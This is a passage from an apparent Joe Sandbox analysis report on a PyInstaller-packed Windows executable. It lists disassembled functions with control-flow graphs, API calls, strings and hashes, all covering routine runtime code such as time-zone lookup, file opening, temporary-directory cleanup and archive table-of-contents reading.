process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                          • API String ID: 2776309574-4232158417
                                                                                                                                                          • Opcode ID: 0521423bedf0c23ef4483b598af0ac91be45681437f26730e4199ade94993b9f
                                                                                                                                                          • Instruction ID: c8326b338dc98d6091d0f6e779b0a7d70fcd6cb88f53e71bb00f11fcf08af478
                                                                                                                                                          • Opcode Fuzzy Hash: 0521423bedf0c23ef4483b598af0ac91be45681437f26730e4199ade94993b9f
                                                                                                                                                          • Instruction Fuzzy Hash: 3032A022A0CE8351EB14BF23D4D62B9A291AF467A0FC45437DA4D436E6EF2DE55CC320
                                                                                                                                                          Function 00007FF714CA5C00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 479 7ff714ca5c00-7ff714ca5c3b call 7ff714ca5588 call 7ff714ca5590 call 7ff714ca55f8 486 7ff714ca5c41-7ff714ca5c4c call 7ff714ca5598 479->486 487 7ff714ca5e65-7ff714ca5eb1 call 7ff714c9a900 call 7ff714ca5588 call 7ff714ca5590 call 7ff714ca55f8 479->487 486->487 492 7ff714ca5c52-7ff714ca5c5c 486->492 512 7ff714ca5fef-7ff714ca605d call 7ff714c9a900 call 7ff714ca1578 487->512 513 7ff714ca5eb7-7ff714ca5ec2 call 7ff714ca5598 487->513 494 7ff714ca5c7e-7ff714ca5c82 492->494 495 7ff714ca5c5e-7ff714ca5c61 492->495 499 7ff714ca5c85-7ff714ca5c8d 494->499 497 7ff714ca5c64-7ff714ca5c6f 495->497 500 7ff714ca5c71-7ff714ca5c78 497->500 501 7ff714ca5c7a-7ff714ca5c7c 497->501 499->499 503 7ff714ca5c8f-7ff714ca5ca2 call 7ff714c9d5fc 499->503 500->497 500->501 501->494 505 7ff714ca5cab-7ff714ca5cb9 501->505 510 7ff714ca5ca4-7ff714ca5ca6 call 7ff714c9a948 503->510 511 7ff714ca5cba-7ff714ca5cc6 call 7ff714c9a948 503->511 510->505 519 7ff714ca5ccd-7ff714ca5cd5 511->519 531 7ff714ca605f-7ff714ca6066 512->531 532 7ff714ca606b-7ff714ca606e 512->532 513->512 523 7ff714ca5ec8-7ff714ca5ed3 call 7ff714ca55c8 513->523 519->519 522 7ff714ca5cd7-7ff714ca5ce8 call 7ff714ca0474 519->522 522->487 533 7ff714ca5cee-7ff714ca5d44 call 7ff714caa4d0 * 4 call 7ff714ca5b1c 522->533 523->512 534 7ff714ca5ed9-7ff714ca5efc call 7ff714c9a948 GetTimeZoneInformation 523->534 535 7ff714ca60fb-7ff714ca60fe 531->535 537 7ff714ca6070 532->537 538 7ff714ca60a5-7ff714ca60b8 call 7ff714c9d5fc 532->538 592 7ff714ca5d46-7ff714ca5d4a 533->592 545 7ff714ca5f02-7ff714ca5f23 534->545 546 7ff714ca5fc4-7ff714ca5fee call 7ff714ca5580 call 7ff714ca5570 call 7ff714ca5578 534->546 542 7ff714ca6104-7ff714ca610c call 7ff714ca5c00 535->542 543 7ff714ca6073 535->543 537->543 556 7ff714ca60c3-7ff714ca60de call 7ff714ca1578 538->556 557 7ff714ca60ba 538->557 550 7ff714ca6078-7ff714ca60a4 call 7ff714c9a948 call 7ff714c8c550 542->550 543->550 551 7ff714ca6073 call 7ff714ca5e7c 543->551 552 7ff714ca5f25-7ff714ca5f2b 545->552 553 7ff714ca5f2e-7ff714ca5f35 545->553 551->550 552->553 560 7ff714ca5f37-7ff714ca5f3f 553->560 561 7ff714ca5f49 553->561 579 7ff714ca60e0-7ff714ca60e3 556->579 580 7ff714ca60e5-7ff714ca60f7 call 7ff714c9a948 556->580 564 7ff714ca60bc-7ff714ca60c1 call 7ff714c9a948 557->564 560->561 567 7ff714ca5f41-7ff714ca5f47 560->567 572 7ff714ca5f4b-7ff714ca5fbf call 7ff714caa4d0 * 4 call 7ff714ca2b5c call 7ff714ca6114 * 2 561->572 564->537 567->572 572->546 579->564 580->535 593 7ff714ca5d50-7ff714ca5d54 592->593 594 7ff714ca5d4c 592->594 593->592 596 7ff714ca5d56-7ff714ca5d7b call 7ff714c96b58 593->596 594->593 602 7ff714ca5d7e-7ff714ca5d82 596->602 605 7ff714ca5d91-7ff714ca5d95 602->605 606 7ff714ca5d84-7ff714ca5d8f 602->606 605->602 606->605 608 7ff714ca5d97-7ff714ca5d9b 606->608 610 7ff714ca5e1c-7ff714ca5e20 608->610 611 7ff714ca5d9d-7ff714ca5dc5 call 7ff714c96b58 608->611 612 7ff714ca5e22-7ff714ca5e24 610->612 613 7ff714ca5e27-7ff714ca5e34 610->613 619 7ff714ca5de3-7ff714ca5de7 611->619 620 7ff714ca5dc7 611->620 612->613 615 7ff714ca5e4f-7ff714ca5e5e call 7ff714ca5580 call 7ff714ca5570 613->615 616 7ff714ca5e36-7ff714ca5e4c call 7ff714ca5b1c 613->616 615->487 616->615 619->610 622 7ff714ca5de9-7ff714ca5e07 call 7ff714c96b58 619->622 624 7ff714ca5dca-7ff714ca5dd1 620->624 631 7ff714ca5e13-7ff714ca5e1a 622->631 624->619 627 7ff714ca5dd3-7ff714ca5de1 624->627 627->619 627->624 631->610 632 7ff714ca5e09-7ff714ca5e0d 631->632 632->610 633 7ff714ca5e0f 632->633 633->631
                                                                                                                                                          APIs
                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF714CA5C45
                                                                                                                                                            • Part of subcall function 00007FF714CA5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF714CA55AC
                                                                                                                                                            • Part of subcall function 00007FF714C9A948: RtlFreeHeap.NTDLL(?,?,?,00007FF714CA2D22,?,?,?,00007FF714CA2D5F,?,?,00000000,00007FF714CA3225,?,?,?,00007FF714CA3157), ref: 00007FF714C9A95E
                                                                                                                                                            • Part of subcall function 00007FF714C9A948: GetLastError.KERNEL32(?,?,?,00007FF714CA2D22,?,?,?,00007FF714CA2D5F,?,?,00000000,00007FF714CA3225,?,?,?,00007FF714CA3157), ref: 00007FF714C9A968
                                                                                                                                                            • Part of subcall function 00007FF714C9A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF714C9A8DF,?,?,?,?,?,00007FF714C9A7CA), ref: 00007FF714C9A909
                                                                                                                                                            • Part of subcall function 00007FF714C9A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF714C9A8DF,?,?,?,?,?,00007FF714C9A7CA), ref: 00007FF714C9A92E
                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF714CA5C34
                                                                                                                                                            • Part of subcall function 00007FF714CA55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF714CA560C
                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF714CA5EAA
                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF714CA5EBB
                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF714CA5ECC
                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF714CA610C), ref: 00007FF714CA5EF3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                          • API String ID: 4070488512-239921721
                                                                                                                                                          • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                          • Instruction ID: fb17e9d17409a53a7c9ecf0bf649c2c0ddf5f227d208f6d2b752614e0e671b8d
                                                                                                                                                          • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                          • Instruction Fuzzy Hash: 62D1D423B18A4245E720BF27D8C01B9A761FF96BA4FD48437EA0D47695EF3CE4498760
                                                                                                                                                          Function 00007FF714CA6964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 693 7ff714ca6964-7ff714ca69d7 call 7ff714ca6698 696 7ff714ca69f1-7ff714ca69fb call 7ff714c98520 693->696 697 7ff714ca69d9-7ff714ca69e2 call 7ff714c94ee8 693->697 702 7ff714ca6a16-7ff714ca6a7f CreateFileW 696->702 703 7ff714ca69fd-7ff714ca6a14 call 7ff714c94ee8 call 7ff714c94f08 696->703 704 7ff714ca69e5-7ff714ca69ec call 7ff714c94f08 697->704 706 7ff714ca6a81-7ff714ca6a87 702->706 707 7ff714ca6afc-7ff714ca6b07 GetFileType 702->707 703->704 721 7ff714ca6d32-7ff714ca6d52 704->721 710 7ff714ca6ac9-7ff714ca6af7 GetLastError call 7ff714c94e7c 706->710 711 7ff714ca6a89-7ff714ca6a8d 706->711 713 7ff714ca6b5a-7ff714ca6b61 707->713 714 7ff714ca6b09-7ff714ca6b44 GetLastError call 7ff714c94e7c CloseHandle 707->714 710->704 711->710 719 7ff714ca6a8f-7ff714ca6ac7 CreateFileW 711->719 717 7ff714ca6b63-7ff714ca6b67 713->717 718 7ff714ca6b69-7ff714ca6b6c 713->718 714->704 727 7ff714ca6b4a-7ff714ca6b55 call 7ff714c94f08 714->727 724 7ff714ca6b72-7ff714ca6bc7 call 7ff714c98438 717->724 718->724 725 7ff714ca6b6e 718->725 719->707 719->710 732 7ff714ca6be6-7ff714ca6c17 call 7ff714ca6418 724->732 733 7ff714ca6bc9-7ff714ca6bd5 call 7ff714ca68a0 724->733 725->724 727->704 738 7ff714ca6c19-7ff714ca6c1b 732->738 739 7ff714ca6c1d-7ff714ca6c5f 732->739 733->732 740 7ff714ca6bd7 733->740 741 7ff714ca6bd9-7ff714ca6be1 call 7ff714c9aac0 738->741 742 7ff714ca6c81-7ff714ca6c8c 739->742 743 7ff714ca6c61-7ff714ca6c65 739->743 740->741 741->721 746 7ff714ca6d30 742->746 747 7ff714ca6c92-7ff714ca6c96 742->747 743->742 745 7ff714ca6c67-7ff714ca6c7c 743->745 745->742 746->721 747->746 749 7ff714ca6c9c-7ff714ca6ce1 CloseHandle CreateFileW 747->749 750 7ff714ca6ce3-7ff714ca6d11 GetLastError call 7ff714c94e7c call 7ff714c98660 749->750 751 7ff714ca6d16-7ff714ca6d2b 749->751 750->751 751->746
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                          • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                          • Instruction ID: 8097982ec5e9aaec49e6ac0162921c40272b3f44d9224b49e23e724b26be6545
                                                                                                                                                          • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                          • Instruction Fuzzy Hash: E4C1E237B28E4285EB10EF66D4902AC7761F78ABA8B910636DF5E57794EF38D019C310
                                                                                                                                                          Function 00007FF714C883C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00007FF714C88919,00007FF714C83F9D), ref: 00007FF714C8842B
                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF714C88919,00007FF714C83F9D), ref: 00007FF714C884AE
                                                                                                                                                          • DeleteFileW.KERNELBASE(?,00007FF714C88919,00007FF714C83F9D), ref: 00007FF714C884CD
                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00007FF714C88919,00007FF714C83F9D), ref: 00007FF714C884DB
                                                                                                                                                          • FindClose.KERNEL32(?,00007FF714C88919,00007FF714C83F9D), ref: 00007FF714C884EC
                                                                                                                                                          • RemoveDirectoryW.KERNELBASE(?,00007FF714C88919,00007FF714C83F9D), ref: 00007FF714C884F5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                          • String ID: %s\*
                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                          • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                          • Instruction ID: 0612392ed9a896471bf0be092fcd034afea9ba0aa34879d3d4b45e2e3a5b2404
                                                                                                                                                          • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                          • Instruction Fuzzy Hash: FB414622A0CD4395EA20AF56F4D91BAA360FB96B64FD00633D65D42A98EF3CD54D8720
                                                                                                                                                          Function 00007FF714CA5E7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1014 7ff714ca5e7c-7ff714ca5eb1 call 7ff714ca5588 call 7ff714ca5590 call 7ff714ca55f8 1021 7ff714ca5fef-7ff714ca605d call 7ff714c9a900 call 7ff714ca1578 1014->1021 1022 7ff714ca5eb7-7ff714ca5ec2 call 7ff714ca5598 1014->1022 1033 7ff714ca605f-7ff714ca6066 1021->1033 1034 7ff714ca606b-7ff714ca606e 1021->1034 1022->1021 1027 7ff714ca5ec8-7ff714ca5ed3 call 7ff714ca55c8 1022->1027 1027->1021 1035 7ff714ca5ed9-7ff714ca5efc call 7ff714c9a948 GetTimeZoneInformation 1027->1035 1036 7ff714ca60fb-7ff714ca60fe 1033->1036 1037 7ff714ca6070 1034->1037 1038 7ff714ca60a5-7ff714ca60b8 call 7ff714c9d5fc 1034->1038 1044 7ff714ca5f02-7ff714ca5f23 1035->1044 1045 7ff714ca5fc4-7ff714ca5fee call 7ff714ca5580 call 7ff714ca5570 call 7ff714ca5578 1035->1045 1041 7ff714ca6104-7ff714ca610c call 7ff714ca5c00 1036->1041 1042 7ff714ca6073 1036->1042 1037->1042 1054 7ff714ca60c3-7ff714ca60de call 7ff714ca1578 1038->1054 1055 7ff714ca60ba 1038->1055 1048 7ff714ca6078-7ff714ca60a4 call 7ff714c9a948 call 7ff714c8c550 1041->1048 1042->1048 1049 7ff714ca6073 call 7ff714ca5e7c 1042->1049 1050 7ff714ca5f25-7ff714ca5f2b 1044->1050 1051 7ff714ca5f2e-7ff714ca5f35 1044->1051 1049->1048 1050->1051 1057 7ff714ca5f37-7ff714ca5f3f 1051->1057 1058 7ff714ca5f49 1051->1058 1073 7ff714ca60e0-7ff714ca60e3 1054->1073 1074 7ff714ca60e5-7ff714ca60f7 call 7ff714c9a948 1054->1074 1061 7ff714ca60bc-7ff714ca60c1 call 7ff714c9a948 1055->1061 1057->1058 1063 7ff714ca5f41-7ff714ca5f47 1057->1063 1067 7ff714ca5f4b-7ff714ca5fbf call 7ff714caa4d0 * 4 call 7ff714ca2b5c call 7ff714ca6114 * 2 1058->1067 1061->1037 1063->1067 1067->1045 1073->1061 1074->1036
                                                                                                                                                          APIs
                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF714CA5EAA
                                                                                                                                                            • Part of subcall function 00007FF714CA55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF714CA560C
                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF714CA5EBB
                                                                                                                                                            • Part of subcall function 00007FF714CA5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF714CA55AC
                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF714CA5ECC
                                                                                                                                                            • Part of subcall function 00007FF714CA55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF714CA55DC
                                                                                                                                                            • Part of subcall function 00007FF714C9A948: RtlFreeHeap.NTDLL(?,?,?,00007FF714CA2D22,?,?,?,00007FF714CA2D5F,?,?,00000000,00007FF714CA3225,?,?,?,00007FF714CA3157), ref: 00007FF714C9A95E
                                                                                                                                                            • Part of subcall function 00007FF714C9A948: GetLastError.KERNEL32(?,?,?,00007FF714CA2D22,?,?,?,00007FF714CA2D5F,?,?,00000000,00007FF714CA3225,?,?,?,00007FF714CA3157), ref: 00007FF714C9A968
                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF714CA610C), ref: 00007FF714CA5EF3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                          • API String ID: 3458911817-239921721
                                                                                                                                                          • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                          • Instruction ID: 0a32cc04e8e1c823f237ed70469219bfbb8023bfa10ad9021db86342bb760dde
                                                                                                                                                          • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                          • Instruction Fuzzy Hash: BC51A932B18A4245E710FF23E8C11B9E760BB5ABA4FD09537DA4D43695EF3CE5098760
                                                                                                                                                          Function 00007FF714C89280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                          • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                          • Instruction ID: 02f39e2e4d1e7c7e8412cc8f67cb8882d520f1f74071f349b03d88f3c7930d19
                                                                                                                                                          • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                          • Instruction Fuzzy Hash: 45F0A422A18A4286F7A09F61F4C97BAB360EB85774F840636DA6D02AD5DF3CD04C8A00
                                                                                                                                                          Function 00007FF714C81950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 331 7ff714c81950-7ff714c8198b call 7ff714c845c0 334 7ff714c81c4e-7ff714c81c72 call 7ff714c8c550 331->334 335 7ff714c81991-7ff714c819d1 call 7ff714c87f90 331->335 340 7ff714c81c3b-7ff714c81c3e call 7ff714c9004c 335->340 341 7ff714c819d7-7ff714c819e7 call 7ff714c906d4 335->341 345 7ff714c81c43-7ff714c81c4b 340->345 346 7ff714c819e9-7ff714c81a03 call 7ff714c94f08 call 7ff714c82910 341->346 347 7ff714c81a08-7ff714c81a24 call 7ff714c9039c 341->347 345->334 346->340 352 7ff714c81a26-7ff714c81a40 call 7ff714c94f08 call 7ff714c82910 347->352 353 7ff714c81a45-7ff714c81a5a call 7ff714c94f28 347->353 352->340 361 7ff714c81a5c-7ff714c81a76 call 7ff714c94f08 call 7ff714c82910 353->361 362 7ff714c81a7b-7ff714c81afc call 7ff714c81c80 * 2 call 7ff714c906d4 353->362 361->340 373 7ff714c81b01-7ff714c81b14 call 7ff714c94f44 362->373 376 7ff714c81b16-7ff714c81b30 call 7ff714c94f08 call 7ff714c82910 373->376 377 7ff714c81b35-7ff714c81b4e call 7ff714c9039c 373->377 376->340 382 7ff714c81b50-7ff714c81b6a call 7ff714c94f08 call 7ff714c82910 377->382 383 7ff714c81b6f-7ff714c81b8b call 7ff714c90110 377->383 382->340 391 7ff714c81b9e-7ff714c81bac 383->391 392 7ff714c81b8d-7ff714c81b99 call 7ff714c82710 383->392 391->340 395 7ff714c81bb2-7ff714c81bb9 391->395 392->340 397 7ff714c81bc1-7ff714c81bc7 395->397 398 7ff714c81bc9-7ff714c81bd6 397->398 399 7ff714c81be0-7ff714c81bef 397->399 400 7ff714c81bf1-7ff714c81bfa 398->400 399->399 399->400 401 7ff714c81bfc-7ff714c81bff 400->401 402 7ff714c81c0f 400->402 401->402 403 7ff714c81c01-7ff714c81c04 401->403 404 7ff714c81c11-7ff714c81c24 402->404 403->402 405 7ff714c81c06-7ff714c81c09 403->405 406 7ff714c81c2d-7ff714c81c39 404->406 407 7ff714c81c26 404->407 405->402 408 7ff714c81c0b-7ff714c81c0d 405->408 406->340 406->397 407->406 408->404
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00007FF714C87F90: _fread_nolock.LIBCMT ref: 00007FF714C8803A
                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF714C81A1B
                                                                                                                                                            • Part of subcall function 00007FF714C82910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF714C81B6A), ref: 00007FF714C8295E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                          • API String ID: 2397952137-3497178890
                                                                                                                                                          • Opcode ID: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
                                                                                                                                                          • Instruction ID: ee01b7d6b4ffe2564bc6df3c1406c8cf01f4f183c0eab1b522d3219be5fff6b1
                                                                                                                                                          • Opcode Fuzzy Hash: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
                                                                                                                                                          • Instruction Fuzzy Hash: D9819371A0CE8785EB20EF26D4812B9A3E1FF86764F944433DA4D47785EE3CE5498760
                                                                                                                                                          Function 00007FF714C81600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
